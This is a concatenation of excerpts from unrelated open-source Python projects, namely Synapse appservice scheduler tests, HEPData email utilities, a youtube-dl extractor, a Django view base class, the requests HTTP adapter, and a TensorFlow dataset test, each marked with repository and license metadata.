        txn.send = Mock(return_value=defer.succeed(False)) # fails to send
        self.store.create_appservice_txn = Mock(
            return_value=defer.succeed(txn)
        )
        # actual call
        self.txnctrl.send(service, events)
        self.store.create_appservice_txn.assert_called_once_with(
            service=service, events=events
        )
        self.assertEquals(1, self.recoverer_fn.call_count) # recoverer made
        self.assertEquals(1, self.recoverer.recover.call_count) # and invoked
        self.assertEquals(1, len(self.txnctrl.recoverers)) # and stored
        self.assertEquals(0, txn.complete.call_count) # txn not completed
        self.store.set_appservice_state.assert_called_once_with(
            service, ApplicationServiceState.DOWN # service marked as down
        )
class ApplicationServiceSchedulerRecovererTestCase(unittest.TestCase):
    """Tests for _Recoverer: replaying unsent transactions with exponential
    backoff until the store reports none left, then firing the callback."""
    def setUp(self):
        self.clock = MockClock()
        self.as_api = Mock()
        self.store = Mock()
        self.service = Mock()
        self.callback = Mock()
        self.recoverer = _Recoverer(
            clock=self.clock,
            as_api=self.as_api,
            store=self.store,
            service=self.service,
            callback=self.callback,
        )
    def test_recover_single_txn(self):
        """One queued txn: sent after the first backoff; callback fires."""
        txn = Mock()
        # return one txn to send, then no more old txns
        txns = [txn, None]
        def take_txn(*args, **kwargs):
            return defer.succeed(txns.pop(0))
        self.store.get_oldest_unsent_txn = Mock(side_effect=take_txn)
        self.recoverer.recover()
        # shouldn't have called anything prior to waiting for exp backoff
        self.assertEquals(0, self.store.get_oldest_unsent_txn.call_count)
        txn.send = Mock(return_value=True)
        # wait for exp backoff
        self.clock.advance_time(2)
        self.assertEquals(1, txn.send.call_count)
        self.assertEquals(1, txn.complete.call_count)
        # 2 because it needs to get None to know there are no more txns
        self.assertEquals(2, self.store.get_oldest_unsent_txn.call_count)
        self.callback.assert_called_once_with(self.recoverer)
        self.assertEquals(self.recoverer.service, self.service)
    def test_recover_retry_txn(self):
        """Failed sends keep doubling the backoff (2, 4, 8, 16s) until one
        succeeds; only then is the txn completed and the callback fired."""
        txn = Mock()
        txns = [txn, None]
        pop_txn = False
        def take_txn(*args, **kwargs):
            # Keep handing back the same txn until pop_txn flips, which
            # simulates it remaining oldest-unsent while sends fail.
            if pop_txn:
                return defer.succeed(txns.pop(0))
            else:
                return defer.succeed(txn)
        self.store.get_oldest_unsent_txn = Mock(side_effect=take_txn)
        self.recoverer.recover()
        self.assertEquals(0, self.store.get_oldest_unsent_txn.call_count)
        txn.send = Mock(return_value=False)
        self.clock.advance_time(2)
        self.assertEquals(1, txn.send.call_count)
        self.assertEquals(0, txn.complete.call_count)
        self.assertEquals(0, self.callback.call_count)
        self.clock.advance_time(4)
        self.assertEquals(2, txn.send.call_count)
        self.assertEquals(0, txn.complete.call_count)
        self.assertEquals(0, self.callback.call_count)
        self.clock.advance_time(8)
        self.assertEquals(3, txn.send.call_count)
        self.assertEquals(0, txn.complete.call_count)
        self.assertEquals(0, self.callback.call_count)
        txn.send = Mock(return_value=True) # successfully send the txn
        pop_txn = True # returns the txn the first time, then no more.
        self.clock.advance_time(16)
        self.assertEquals(1, txn.send.call_count) # new mock reset call count
        self.assertEquals(1, txn.complete.call_count)
        self.callback.assert_called_once_with(self.recoverer)
class ApplicationServiceSchedulerQueuerTestCase(unittest.TestCase):
    """Tests for _ServiceQueuer: events queue up per-service while a send
    is in flight, and flush once the in-flight send's deferred resolves."""
    def setUp(self):
        self.txn_ctrl = Mock()
        self.queuer = _ServiceQueuer(self.txn_ctrl)
    def test_send_single_event_no_queue(self):
        # Expect the event to be sent immediately.
        service = Mock(id=4)
        event = Mock()
        self.queuer.enqueue(service, event)
        self.txn_ctrl.send.assert_called_once_with(service, [event])
    def test_send_single_event_with_queue(self):
        d = defer.Deferred()
        # send() returning an unresolved deferred keeps the send "in
        # flight", so subsequent events must queue behind it.
        self.txn_ctrl.send = Mock(return_value=d)
        service = Mock(id=4)
        event = Mock(event_id="first")
        event2 = Mock(event_id="second")
        event3 = Mock(event_id="third")
        # Send an event and don't resolve it just yet.
        self.queuer.enqueue(service, event)
        # Send more events: expect send() to NOT be called multiple times.
        self.queuer.enqueue(service, event2)
        self.queuer.enqueue(service, event3)
        self.txn_ctrl.send.assert_called_with(service, [event])
        self.assertEquals(1, self.txn_ctrl.send.call_count)
        # Resolve the send event: expect the queued events to be sent
        d.callback(service)
        self.txn_ctrl.send.assert_called_with(service, [event2, event3])
        self.assertEquals(2, self.txn_ctrl.send.call_count)
    def test_multiple_service_queues(self):
        # Tests that each service has its own queue, and that they don't block
        # on each other.
        srv1 = Mock(id=4)
        srv_1_defer = defer.Deferred()
        srv_1_event = Mock(event_id="srv1a")
        srv_1_event2 = Mock(event_id="srv1b")
        srv2 = Mock(id=6)
        srv_2_defer = defer.Deferred()
        srv_2_event = Mock(event_id="srv2a")
        srv_2_event2 = Mock(event_id="srv2b")
        send_return_list = [srv_1_defer, srv_2_defer]
        self.txn_ctrl.send = Mock(side_effect=lambda x,y: send_return_list.pop(0))
        # send events for different ASes and make sure they are sent
        self.queuer.enqueue(srv1, srv_1_event)
        self.queuer.enqueue(srv1, srv_1_event2)
        self.txn_ctrl.send.assert_called_with(srv1, [srv_1_event])
        self.queuer.enqueue(srv2, srv_2_event)
        self.queuer.enqueue(srv2, srv_2_event2)
        self.txn_ctrl.send.assert_called_with(srv2, [srv_2_event])
        # make sure callbacks for a service only send queued events for THAT
        # service
        srv_2_defer.callback(srv2)
        self.txn_ctrl.send.assert_called_with(srv2, [srv_2_event2])
        self.assertEquals(3, self.txn_ctrl.send.call_count)
| apache-2.0 |
HEPData/hepdata | hepdata/modules/email/utils.py | 1 | 3669 | # This file is part of HEPData.
# Copyright (C) 2016 CERN.
#
# HEPData is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# HEPData is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with HEPData; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""Provides high-level common email utilities."""
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from smtplib import SMTP, SMTPRecipientsRefused
from celery import shared_task
from flask import current_app
from flask_celeryext import create_celery_app
def create_send_email_task(destination, subject, message, reply_to_address=None):
    """Queue an asynchronous task that sends an email.

    When the app is in TESTING mode no email is queued; instead a
    plain-text rendering of the HTML message is printed so tests can
    inspect what would have been sent.

    :param destination: recipient address(es), comma-separated
    :param subject: email subject line
    :param message: HTML message body
    :param reply_to_address: optional sender/reply-to override
    :return: None
    """
    testing = current_app.config.get('TESTING', False)
    if testing:
        print('Not sending email as TESTING=True; would have sent email to {0}:'.format(destination))
        import re
        tag_pattern = re.compile('(?s)<.*?>')
        blank_runs = re.compile(r'(?ms)(\n(\s*)){2,}')
        # Strip markup, then collapse the resulting runs of blank lines.
        text_only = re.sub(tag_pattern, '', message)
        print(re.sub(blank_runs, '\n', text_only))
        return
    # This is required for some unknown reason due to an initialisation
    # problem with celery: the celery app has to be (re)created from the
    # current Flask app before tasks can be queued.
    create_celery_app(current_app)
    print('Sending email to {0}'.format(destination))
    send_email.delay(destination, subject, message, reply_to_address)
@shared_task
def send_email(destination, subject, message, reply_to_address=None):
    """Celery task body: deliver an HTML email over SMTP.

    The configured admin address is appended to the recipient list for
    every message.  Recipient refusals are reported via send_error_mail
    instead of being raised; any other failure is printed and re-raised.
    """
    try:
        smtp_connection = connect()

        envelope = MIMEMultipart('alternative')
        envelope['Subject'] = subject
        sender = reply_to_address if reply_to_address else current_app.config['MAIL_DEFAULT_SENDER']
        envelope['From'] = sender
        envelope['To'] = destination
        envelope.attach(MIMEText(message, 'html', 'utf-8'))

        all_recipients = destination.split(',')
        all_recipients.append(current_app.config['ADMIN_EMAIL'])

        smtp_connection.send_message(envelope, current_app.config['MAIL_DEFAULT_SENDER'], all_recipients)
        smtp_connection.quit()
    except SMTPRecipientsRefused as smtp_error:
        send_error_mail(smtp_error)
    except Exception as e:
        print('Exception occurred.')
        raise e
def send_error_mail(exception):
    """Notify the configured system address that an email failed to send.

    The destination is the security sender address, which should always
    be valid.

    :param exception: SMTPRecipientsRefused exception
    """
    admin_address = current_app.config['SECURITY_EMAIL_SENDER']
    create_send_email_task(admin_address, '[HEPData Error] Error sending email', str(exception))
def connect():
    """Open, and optionally authenticate, an SMTP connection using the
    application's mail configuration."""
    config = current_app.config
    connection = SMTP()
    connection.connect(config['MAIL_SERVER'], config['MAIL_PORT'])
    if not config['SMTP_NO_PASSWORD']:
        # Upgrade to TLS before sending credentials when configured.
        if config['SMTP_ENCRYPTION']:
            connection.starttls()
        connection.login(config['MAIL_USERNAME'], config['MAIL_PASSWORD'])
    return connection
| gpl-2.0 |
jemekite/youtube-dl | youtube_dl/extractor/tapely.py | 124 | 3760 | # coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..compat import (
compat_urllib_request,
)
from ..utils import (
clean_html,
ExtractorError,
float_or_none,
parse_iso8601,
)
class TapelyIE(InfoExtractor):
    # Extractor for tape.ly mixtapes.  A bare tape URL yields a playlist
    # of its songs; an optional trailing /<songnr> (1-based) selects a
    # single song instead.
    _VALID_URL = r'https?://(?:www\.)?tape\.ly/(?P<id>[A-Za-z0-9\-_]+)(?:/(?P<songnr>\d+))?'
    _API_URL = 'http://tape.ly/showtape?id={0:}'
    _S3_SONG_URL = 'http://mytape.s3.amazonaws.com/{0:}'
    _SOUNDCLOUD_SONG_URL = 'http://api.soundcloud.com{0:}'
    _TESTS = [
        {
            'url': 'http://tape.ly/my-grief-as-told-by-water',
            'info_dict': {
                'id': 23952,
                'title': 'my grief as told by water',
                'thumbnail': 're:^https?://.*\.png$',
                'uploader_id': 16484,
                'timestamp': 1411848286,
                'description': 'For Robin and Ponkers, whom the tides of life have taken out to sea.',
            },
            'playlist_count': 13,
        },
        {
            'url': 'http://tape.ly/my-grief-as-told-by-water/1',
            'md5': '79031f459fdec6530663b854cbc5715c',
            'info_dict': {
                'id': 258464,
                'title': 'Dreaming Awake (My Brightest Diamond)',
                'ext': 'm4a',
            },
        },
    ]
    def _real_extract(self, url):
        mobj = re.match(self._VALID_URL, url)
        display_id = mobj.group('id')
        playlist_url = self._API_URL.format(display_id)
        request = compat_urllib_request.Request(playlist_url)
        # The showtape endpoint only serves JSON to AJAX-style requests,
        # so mimic one with the headers the site itself sends.
        request.add_header('X-Requested-With', 'XMLHttpRequest')
        request.add_header('Accept', 'application/json')
        request.add_header('Referer', url)
        playlist = self._download_json(request, display_id)
        tape = playlist['tape']
        entries = []
        for s in tape['songs']:
            song = s['song']
            entry = {
                'id': song['id'],
                'duration': float_or_none(song.get('songduration'), 1000),
                'title': song['title'],
            }
            # Songs are hosted on S3, YouTube or SoundCloud; for the
            # latter two, delegate to the corresponding extractor.
            if song['source'] == 'S3':
                entry.update({
                    'url': self._S3_SONG_URL.format(song['filename']),
                })
                entries.append(entry)
            elif song['source'] == 'YT':
                self.to_screen('YouTube video detected')
                yt_id = song['filename'].replace('/youtube/', '')
                entry.update(self.url_result(yt_id, 'Youtube', video_id=yt_id))
                entries.append(entry)
            elif song['source'] == 'SC':
                self.to_screen('SoundCloud song detected')
                sc_url = self._SOUNDCLOUD_SONG_URL.format(song['filename'])
                entry.update(self.url_result(sc_url, 'Soundcloud'))
                entries.append(entry)
            else:
                self.report_warning('Unknown song source: %s' % song['source'])
        if mobj.group('songnr'):
            # A trailing /<n> in the URL requests just the n-th song.
            songnr = int(mobj.group('songnr')) - 1
            try:
                return entries[songnr]
            except IndexError:
                raise ExtractorError(
                    'No song with index: %s' % mobj.group('songnr'),
                    expected=True)
        return {
            '_type': 'playlist',
            'id': tape['id'],
            'display_id': display_id,
            'title': tape['name'],
            'entries': entries,
            'thumbnail': tape.get('image_url'),
            'description': clean_html(tape.get('subtext')),
            'like_count': tape.get('likescount'),
            'uploader_id': tape.get('user_id'),
            'timestamp': parse_iso8601(tape.get('published_at')),
        }
| unlicense |
wavelets/alpha | pau/views/base.py | 3 | 2277 | import logging
from django.conf import settings
from django.contrib.auth import logout as auth_logout
from django.http import HttpResponseRedirect
from paucore.utils.web import smart_reverse
from paucore.web.template import render_template_response
from paucore.web.views import MMLActionView
from pau import bridge
from pau.forms import ReportPostForm
from pau.views.mixins import OAuthLoginRequiredViewMixin
logger = logging.getLogger(__name__)
def rate_limit_handler(request, *args, **kwargs):
    """Render the rate-limit error page with an HTTP 429 status code."""
    rendered = render_template_response(request, {}, '429.html')
    rendered.status_code = 429
    return rendered
class PauMMLActionView(OAuthLoginRequiredViewMixin, MMLActionView):
    # Base class for Pau's logged-in views: fills the shared template
    # context (JS page hooks, API proxy URL, nav state) and translates
    # bridge API failures into user-facing behaviour (429 page, or
    # logout + redirect on auth failure).
    # NOTE: this module uses Python 2 ``except X, e`` syntax throughout.
    selected_nav_page = None  # set by subclasses to highlight a nav entry
    minify_html = False
    def populate_context(self, request, *args, **kwargs):
        # Extend the mixin/base context with everything the Pau frontend
        # JS expects on page load.
        super(PauMMLActionView, self).populate_context(request, *args, **kwargs)
        self.view_ctx.update_ctx({
            '__js_page_load_hooks': ['utils.handle_resize', 'init_pau', 'init_post_delete', 'init_mute_user', 'init_post_report',
                                     'init_star_post', 'init_repost', 'pau.init_fixed_nav'],
            '__js_api_options': {
                'api_base_url': smart_reverse(request, 'omo_api_proxy'),
            },
            '__js_canvas_mode': 'pau',
            '__js_subscribe_url': 'https://account.app.net/upgrade/',
            '__js_upgrade_storage_url': 'https://account.app.net/settings/upgrade/storage/',
            'selected_nav_page': self.selected_nav_page,
            'explore_streams': bridge.list_explore_streams(request),
            'report_post_form': ReportPostForm(),
        })
        self.view_ctx.forms = []
    def dispatch(self, request, *args, **kwargs):
        try:
            response = super(PauMMLActionView, self).dispatch(request, *args, **kwargs)
        except bridge.AlphaRateLimitAPIException, e:
            # The upstream API rate-limited us: show the 429 page.
            logger.warn('Hit an api rate limit: %s', e)
            return rate_limit_handler(request, *args, **kwargs)
        except bridge.AlphaAuthAPIException, e:
            # Auth failure against the API invalidates the local session.
            logger.info('Alpha auth API execption: %s', e)
            auth_logout(request)
            return HttpResponseRedirect('/')
        response['X-Build-Info'] = settings.BUILD_INFO
        return response
| mit |
vipulkanade/EventbriteDjango | lib/python2.7/site-packages/pip/_vendor/requests/adapters.py | 175 | 17495 | # -*- coding: utf-8 -*-
"""
requests.adapters
~~~~~~~~~~~~~~~~~
This module contains the transport adapters that Requests uses to define
and maintain connections.
"""
import os.path
import socket
from .models import Response
from .packages.urllib3.poolmanager import PoolManager, proxy_from_url
from .packages.urllib3.response import HTTPResponse
from .packages.urllib3.util import Timeout as TimeoutSauce
from .packages.urllib3.util.retry import Retry
from .compat import urlparse, basestring
from .utils import (DEFAULT_CA_BUNDLE_PATH, get_encoding_from_headers,
prepend_scheme_if_needed, get_auth_from_url, urldefragauth,
select_proxy)
from .structures import CaseInsensitiveDict
from .packages.urllib3.exceptions import ClosedPoolError
from .packages.urllib3.exceptions import ConnectTimeoutError
from .packages.urllib3.exceptions import HTTPError as _HTTPError
from .packages.urllib3.exceptions import MaxRetryError
from .packages.urllib3.exceptions import NewConnectionError
from .packages.urllib3.exceptions import ProxyError as _ProxyError
from .packages.urllib3.exceptions import ProtocolError
from .packages.urllib3.exceptions import ReadTimeoutError
from .packages.urllib3.exceptions import SSLError as _SSLError
from .packages.urllib3.exceptions import ResponseError
from .cookies import extract_cookies_to_jar
from .exceptions import (ConnectionError, ConnectTimeout, ReadTimeout, SSLError,
ProxyError, RetryError)
from .auth import _basic_auth_str
# Defaults for HTTPAdapter's urllib3 connection pooling behaviour.
DEFAULT_POOLBLOCK = False  # don't block waiting for a free pooled connection
DEFAULT_POOLSIZE = 10  # number of cached pools, and connections kept per pool
DEFAULT_RETRIES = 0  # no automatic retries unless the caller requests them
DEFAULT_POOL_TIMEOUT = None  # timeout used when checking a connection out of a proxy pool
class BaseAdapter(object):
    """The Base Transport Adapter"""
    def __init__(self):
        super(BaseAdapter, self).__init__()
    def send(self):
        """Dispatch a request; concrete adapters must override this."""
        raise NotImplementedError
    def close(self):
        """Release adapter resources; concrete adapters must override this."""
        raise NotImplementedError
class HTTPAdapter(BaseAdapter):
    """The built-in HTTP Adapter for urllib3.

    Provides a general-case interface for Requests sessions to contact HTTP and
    HTTPS urls by implementing the Transport Adapter interface. This class will
    usually be created by the :class:`Session <Session>` class under the
    covers.

    :param pool_connections: The number of urllib3 connection pools to cache.
    :param pool_maxsize: The maximum number of connections to save in the pool.
    :param int max_retries: The maximum number of retries each connection
        should attempt. Note, this applies only to failed DNS lookups, socket
        connections and connection timeouts, never to requests where data has
        made it to the server. By default, Requests does not retry failed
        connections. If you need granular control over the conditions under
        which we retry a request, import urllib3's ``Retry`` class and pass
        that instead.
    :param pool_block: Whether the connection pool should block for connections.

    Usage::

      >>> import requests
      >>> s = requests.Session()
      >>> a = requests.adapters.HTTPAdapter(max_retries=3)
      >>> s.mount('http://', a)
    """
    __attrs__ = ['max_retries', 'config', '_pool_connections', '_pool_maxsize',
                 '_pool_block']

    def __init__(self, pool_connections=DEFAULT_POOLSIZE,
                 pool_maxsize=DEFAULT_POOLSIZE, max_retries=DEFAULT_RETRIES,
                 pool_block=DEFAULT_POOLBLOCK):
        if max_retries == DEFAULT_RETRIES:
            # Historical default: zero retries, but don't treat read
            # errors as retryable.
            self.max_retries = Retry(0, read=False)
        else:
            self.max_retries = Retry.from_int(max_retries)
        self.config = {}
        self.proxy_manager = {}

        super(HTTPAdapter, self).__init__()

        self._pool_connections = pool_connections
        self._pool_maxsize = pool_maxsize
        self._pool_block = pool_block

        self.init_poolmanager(pool_connections, pool_maxsize, block=pool_block)

    def __getstate__(self):
        return dict((attr, getattr(self, attr, None)) for attr in
                    self.__attrs__)

    def __setstate__(self, state):
        # Can't handle by adding 'proxy_manager' to self.__attrs__ because
        # self.poolmanager uses a lambda function, which isn't pickleable.
        self.proxy_manager = {}
        self.config = {}

        for attr, value in state.items():
            setattr(self, attr, value)

        self.init_poolmanager(self._pool_connections, self._pool_maxsize,
                              block=self._pool_block)

    def init_poolmanager(self, connections, maxsize, block=DEFAULT_POOLBLOCK, **pool_kwargs):
        """Initializes a urllib3 PoolManager.

        This method should not be called from user code, and is only
        exposed for use when subclassing the
        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.

        :param connections: The number of urllib3 connection pools to cache.
        :param maxsize: The maximum number of connections to save in the pool.
        :param block: Block when no free connections are available.
        :param pool_kwargs: Extra keyword arguments used to initialize the Pool Manager.
        """
        # save these values for pickling
        self._pool_connections = connections
        self._pool_maxsize = maxsize
        self._pool_block = block

        self.poolmanager = PoolManager(num_pools=connections, maxsize=maxsize,
                                       block=block, strict=True, **pool_kwargs)

    def proxy_manager_for(self, proxy, **proxy_kwargs):
        """Return urllib3 ProxyManager for the given proxy.

        This method should not be called from user code, and is only
        exposed for use when subclassing the
        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.

        :param proxy: The proxy to return a urllib3 ProxyManager for.
        :param proxy_kwargs: Extra keyword arguments used to configure the Proxy Manager.
        :returns: ProxyManager
        """
        # Managers are cached per proxy URL so repeated requests through
        # the same proxy reuse its connection pools.
        if proxy not in self.proxy_manager:
            proxy_headers = self.proxy_headers(proxy)
            self.proxy_manager[proxy] = proxy_from_url(
                proxy,
                proxy_headers=proxy_headers,
                num_pools=self._pool_connections,
                maxsize=self._pool_maxsize,
                block=self._pool_block,
                **proxy_kwargs)

        return self.proxy_manager[proxy]

    def cert_verify(self, conn, url, verify, cert):
        """Verify a SSL certificate. This method should not be called from user
        code, and is only exposed for use when subclassing the
        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.

        :param conn: The urllib3 connection object associated with the cert.
        :param url: The requested URL.
        :param verify: Whether we should actually verify the certificate.
        :param cert: The SSL certificate to verify.
        """
        if url.lower().startswith('https') and verify:

            cert_loc = None

            # Allow self-specified cert location.
            if verify is not True:
                cert_loc = verify

            if not cert_loc:
                cert_loc = DEFAULT_CA_BUNDLE_PATH

            if not cert_loc:
                raise Exception("Could not find a suitable SSL CA certificate bundle.")

            conn.cert_reqs = 'CERT_REQUIRED'

            # urllib3 distinguishes a single bundle file (ca_certs) from a
            # directory of hashed certificates (ca_cert_dir).
            if not os.path.isdir(cert_loc):
                conn.ca_certs = cert_loc
            else:
                conn.ca_cert_dir = cert_loc
        else:
            conn.cert_reqs = 'CERT_NONE'
            conn.ca_certs = None
            conn.ca_cert_dir = None

        if cert:
            # A (cert, key) tuple or a single combined cert file.
            if not isinstance(cert, basestring):
                conn.cert_file = cert[0]
                conn.key_file = cert[1]
            else:
                conn.cert_file = cert

    def build_response(self, req, resp):
        """Builds a :class:`Response <requests.Response>` object from a urllib3
        response. This should not be called from user code, and is only exposed
        for use when subclassing the
        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`

        :param req: The :class:`PreparedRequest <PreparedRequest>` used to generate the response.
        :param resp: The urllib3 response object.
        """
        response = Response()

        # Fallback to None if there's no status_code, for whatever reason.
        response.status_code = getattr(resp, 'status', None)

        # Make headers case-insensitive.
        response.headers = CaseInsensitiveDict(getattr(resp, 'headers', {}))

        # Set encoding.
        response.encoding = get_encoding_from_headers(response.headers)
        response.raw = resp
        response.reason = response.raw.reason

        if isinstance(req.url, bytes):
            response.url = req.url.decode('utf-8')
        else:
            response.url = req.url

        # Add new cookies from the server.
        extract_cookies_to_jar(response.cookies, req, resp)

        # Give the Response some context.
        response.request = req
        response.connection = self

        return response

    def get_connection(self, url, proxies=None):
        """Returns a urllib3 connection for the given URL. This should not be
        called from user code, and is only exposed for use when subclassing the
        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.

        :param url: The URL to connect to.
        :param proxies: (optional) A Requests-style dictionary of proxies used on this request.
        """
        proxy = select_proxy(url, proxies)

        if proxy:
            proxy = prepend_scheme_if_needed(proxy, 'http')
            proxy_manager = self.proxy_manager_for(proxy)
            conn = proxy_manager.connection_from_url(url)
        else:
            # Only scheme should be lower case
            parsed = urlparse(url)
            url = parsed.geturl()
            conn = self.poolmanager.connection_from_url(url)

        return conn

    def close(self):
        """Disposes of any internal state.

        Currently, this just closes the PoolManager, which closes pooled
        connections.
        """
        self.poolmanager.clear()

    def request_url(self, request, proxies):
        """Obtain the url to use when making the final request.

        If the message is being sent through a HTTP proxy, the full URL has to
        be used. Otherwise, we should only use the path portion of the URL.

        This should not be called from user code, and is only exposed for use
        when subclassing the
        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.

        :param request: The :class:`PreparedRequest <PreparedRequest>` being sent.
        :param proxies: A dictionary of schemes or schemes and hosts to proxy URLs.
        """
        proxy = select_proxy(request.url, proxies)
        scheme = urlparse(request.url).scheme
        if proxy and scheme != 'https':
            url = urldefragauth(request.url)
        else:
            url = request.path_url

        return url

    def add_headers(self, request, **kwargs):
        """Add any headers needed by the connection. As of v2.0 this does
        nothing by default, but is left for overriding by users that subclass
        the :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.

        This should not be called from user code, and is only exposed for use
        when subclassing the
        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.

        :param request: The :class:`PreparedRequest <PreparedRequest>` to add headers to.
        :param kwargs: The keyword arguments from the call to send().
        """
        pass

    def proxy_headers(self, proxy):
        """Returns a dictionary of the headers to add to any request sent
        through a proxy. This works with urllib3 magic to ensure that they are
        correctly sent to the proxy, rather than in a tunnelled request if
        CONNECT is being used.

        This should not be called from user code, and is only exposed for use
        when subclassing the
        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.

        :param proxies: The url of the proxy being used for this request.
        """
        headers = {}
        username, password = get_auth_from_url(proxy)

        if username and password:
            headers['Proxy-Authorization'] = _basic_auth_str(username,
                                                             password)

        return headers

    def send(self, request, stream=False, timeout=None, verify=True, cert=None, proxies=None):
        """Sends PreparedRequest object. Returns Response object.

        :param request: The :class:`PreparedRequest <PreparedRequest>` being sent.
        :param stream: (optional) Whether to stream the request content.
        :param timeout: (optional) How long to wait for the server to send
            data before giving up, as a float, or a :ref:`(connect timeout,
            read timeout) <timeouts>` tuple.
        :type timeout: float or tuple
        :param verify: (optional) Whether to verify SSL certificates.
        :param cert: (optional) Any user-provided SSL certificate to be trusted.
        :param proxies: (optional) The proxies dictionary to apply to the request.
        """
        conn = self.get_connection(request.url, proxies)

        self.cert_verify(conn, request.url, verify, cert)
        url = self.request_url(request, proxies)
        self.add_headers(request)

        # A request is sent chunked when it has a body but no
        # Content-Length header (i.e. the length is unknown up front).
        chunked = not (request.body is None or 'Content-Length' in request.headers)

        if isinstance(timeout, tuple):
            try:
                connect, read = timeout
                timeout = TimeoutSauce(connect=connect, read=read)
            except ValueError:
                # this may raise a string formatting error.
                err = ("Invalid timeout {0}. Pass a (connect, read) "
                       "timeout tuple, or a single float to set "
                       "both timeouts to the same value".format(timeout))
                raise ValueError(err)
        else:
            timeout = TimeoutSauce(connect=timeout, read=timeout)

        try:
            if not chunked:
                resp = conn.urlopen(
                    method=request.method,
                    url=url,
                    body=request.body,
                    headers=request.headers,
                    redirect=False,
                    assert_same_host=False,
                    preload_content=False,
                    decode_content=False,
                    retries=self.max_retries,
                    timeout=timeout
                )

            # Send the request.
            else:
                if hasattr(conn, 'proxy_pool'):
                    conn = conn.proxy_pool

                low_conn = conn._get_conn(timeout=DEFAULT_POOL_TIMEOUT)

                try:
                    low_conn.putrequest(request.method,
                                        url,
                                        skip_accept_encoding=True)

                    for header, value in request.headers.items():
                        low_conn.putheader(header, value)

                    low_conn.endheaders()

                    # HTTP/1.1 chunked transfer encoding: hex length line,
                    # CRLF, chunk data, CRLF, terminated by a zero chunk.
                    for i in request.body:
                        low_conn.send(hex(len(i))[2:].encode('utf-8'))
                        low_conn.send(b'\r\n')
                        low_conn.send(i)
                        low_conn.send(b'\r\n')
                    low_conn.send(b'0\r\n\r\n')

                    # Receive the response from the server
                    try:
                        # For Python 2.7+ versions, use buffering of HTTP
                        # responses
                        r = low_conn.getresponse(buffering=True)
                    except TypeError:
                        # For compatibility with Python 2.6 versions and back
                        r = low_conn.getresponse()

                    resp = HTTPResponse.from_httplib(
                        r,
                        pool=conn,
                        connection=low_conn,
                        preload_content=False,
                        decode_content=False
                    )
                except:
                    # If we hit any problems here, clean up the connection.
                    # Then, reraise so that we can handle the actual exception.
                    low_conn.close()
                    raise

        except (ProtocolError, socket.error) as err:
            raise ConnectionError(err, request=request)

        except MaxRetryError as e:
            if isinstance(e.reason, ConnectTimeoutError):
                # TODO: Remove this in 3.0.0: see #2811
                if not isinstance(e.reason, NewConnectionError):
                    raise ConnectTimeout(e, request=request)

            if isinstance(e.reason, ResponseError):
                raise RetryError(e, request=request)

            raise ConnectionError(e, request=request)

        except ClosedPoolError as e:
            raise ConnectionError(e, request=request)

        except _ProxyError as e:
            raise ProxyError(e)

        except (_SSLError, _HTTPError) as e:
            if isinstance(e, _SSLError):
                raise SSLError(e, request=request)
            elif isinstance(e, ReadTimeoutError):
                raise ReadTimeout(e, request=request)
            else:
                raise

        return self.build_response(request, resp)
| mit |
theflofly/tensorflow | tensorflow/contrib/data/python/kernel_tests/assert_element_shape_test.py | 8 | 9250 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the experimental input pipeline ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.data.python.ops import batching
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.platform import test
@test_util.run_v1_only("deprecated API, no eager or V2 test coverage")
class AssertElementShapeTest(test_base.DatasetTestBase):
def test_assert_element_shape(self):
def create_dataset(_):
return (array_ops.ones(2, dtype=dtypes.float32),
array_ops.zeros((3, 4), dtype=dtypes.int32))
dataset = dataset_ops.Dataset.range(5).map(create_dataset)
expected_shapes = (tensor_shape.TensorShape(2),
tensor_shape.TensorShape((3, 4)))
self.assertEqual(expected_shapes,
dataset_ops.get_legacy_output_shapes(dataset))
result = dataset.apply(batching.assert_element_shape(expected_shapes))
self.assertEqual(expected_shapes,
dataset_ops.get_legacy_output_shapes(result))
iterator = dataset_ops.make_initializable_iterator(result)
init_op = iterator.initializer
get_next = iterator.get_next()
with self.cached_session() as sess:
sess.run(init_op)
for _ in range(5):
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def test_assert_wrong_element_shape(self):
def create_dataset(_):
return (array_ops.ones(2, dtype=dtypes.float32),
array_ops.zeros((3, 4), dtype=dtypes.int32))
dataset = dataset_ops.Dataset.range(3).map(create_dataset)
wrong_shapes = (tensor_shape.TensorShape(2),
tensor_shape.TensorShape((3, 10)))
with self.assertRaises(ValueError):
dataset.apply(batching.assert_element_shape(wrong_shapes))
def test_assert_element_shape_on_unknown_shape_dataset(self):
